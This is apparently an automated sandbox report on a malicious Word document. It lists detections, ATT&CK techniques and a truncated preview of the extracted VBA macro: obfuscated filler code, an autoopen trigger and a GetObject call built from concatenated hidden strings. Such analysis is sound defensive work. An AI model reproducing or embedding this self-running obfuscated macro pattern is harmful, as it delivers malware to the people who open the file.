MALICIOUS (Risk Score: 222)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of GetObject calls within the VBA p-code suggests an attempt to execute code, likely to download and run a secondary payload. No specific family could be identified, and no external URLs or executable payloads were directly extracted from the provided evidence.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6935149-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6935149-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22803 bytes |
SHA-256: 88b29fe1af585fc026ccdac870d939ebb1738999285dc0d4ae05469fcd17fce4
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "XAxAGAGw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WAAXGUD"
Attribute VB_Base = "0{8DAF25A1-E408-4322-B533-871FAE1A45B9}{F4A58151-8D57-4927-97CE-1C9C0AF39C73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NAD1DAA"
Attribute VB_Base = "0{9B8420C6-1C2B-4907-86E9-82DA19FBF188}{B0254524-F8B5-45C0-8548-63E646B645F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "DA4cA1"
Function GDAUABAC()
If D1AAwA > V_AUUAQD Then
cZ4ZAD _
= 220963627 - _
fAwA_AoB
If kAAAxAA < _
tD11GUA Then
Hour _
Rnd _
(TcBxQZC)
End If
End If
Set kcQUAc _
= VX4BGBG
If JoADAZk > pAUAQAwA Then
aXcGXB_U _
= 292625136 - _
qAU_QA
If ZAG4CC < _
bAcwUA Then
Hour _
Rnd _
(Kwcw_D)
End If
End If
Set jcGUoxZ _
= sUBBxU
End Function
Sub autoopen()
GAGBxA
End Sub
Function mQA1_A()
If jDQAUcB > XDAAAAA Then
S4AAAcc _
= 755750517 - _
hAcUUAAA
If z_AUxU < _
X_ZUZk Then
Hour _
Rnd _
(WABAAA)
End If
End If
Set KZUAxUZ _
= WoADAA
If KAkwXcU > pAAADGZA Then
kAQACABA _
= 565747919 - _
HABDAADD
If iQ4BA4xC < _
jCoBQGAX Then
Hour _
Rnd _
(qQkG4B)
End If
End If
Set LkDAAA _
= nZBAUACD
End Function
Attribute VB_Name = "TXAQox"
Function ZABAAAXX()
If ucAAAZUU > FAUUUAA Then
GZQAAA _
= 591010747 - _
zoZDDAx
If sAAAAw < _
JAAkABA Then
Hour _
Rnd _
(TAkAwwD)
End If
End If
Set CAXDUQA _
= zAXAAUB
If PQBUAA_ > MAAAkCX Then
mxAUXAx _
= 609547665 - _
GkxB1DAA
If H_AUGcw < _
AAAQD_B Then
Hour _
Rnd _
(FDQA4QA)
End If
End If
Set aADQ1cA _
= oAXQAA
End Function
Function GAGBxA()
On Error Resume Next
If ZoUAAwX > dBDADAA Then
rAoAAA _
= 62144012 - _
sDGZwA
If jAGAxA < _
AxCAUDA Then
Hour _
Rnd _
(EUwBAGG)
End If
End If
Set wQAAAo _
= vDcAA1
If uAUDDB_ > Q_UDAo Then
tXAcB_D _
= 275377616 - _
GQZA_AD
If jcoDkUDQ < _
nwGAAwD Then
Hour _
Rnd _
(XADQ_A)
End If
End If
Set Nx1AACAA _
= Q1_CAUDA
If GokAcA > iQABDA Then
c144AG _
= 690343970 - _
nDDB4U
If wAUAAx < _
m_Aocw1 Then
Hour _
Rnd _
(toC4_XQB)
End If
End If
Set TAcAkAA _
= vUAQCUX
uQADA4AA = NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB
If tGUDBA > DQADAG Then
UADw_BDA _
= 729503958 - _
oxADBU
If aBxUGA < _
QDU_AA Then
Hour _
Rnd _
(iCA1BcD)
End If
End If
Set d1xAQUZ_ _
= UwAX_ZQ
If q1UC_Qo > jABD_QA1 Then
i4kGUoQc _
= 875481624 - _
mDBDxA
If fXADACU < _
zAcUAZxC Then
Hour _
Rnd _
(FCBxkG)
End If
End If
Set AUAAAQc _
= M_U1ABxA
Set N4AAXDDA = GetObject(NAD1DAA.lUAAxB + NAD1DAA.QAGBDQB + NAD1DAA.lUAAxB + NAD1DAA.qx1BcA_w + NAD1DAA.lUAAxB + NAD1DAA.rZwDAGAA + NAD1DAA.lUAAxB)
If jAAUwG > GAGAQx Then
QA1AQQQ _
= 412465078 - _
jAACAcA
If dBADQQ < _
l1ADU1A Then
Hour _
Rnd _
(lQoQwAQ)
End If
End If
Set pAkUAQo _
= CQQAAADk
If hUwACcAD > i_1DDc Then
UDAAAC _
= 371577735 - _
aUCAAA
If wB_AAC_D < _
fwAG_G Then
Hour _
Rnd _
(qAQAowA)
End If
End If
Set IXBA_AAk _
= nA_ADAQ
If 33994 = 33994 Then
If mAZGXDDB > lAU_DA
... (truncated)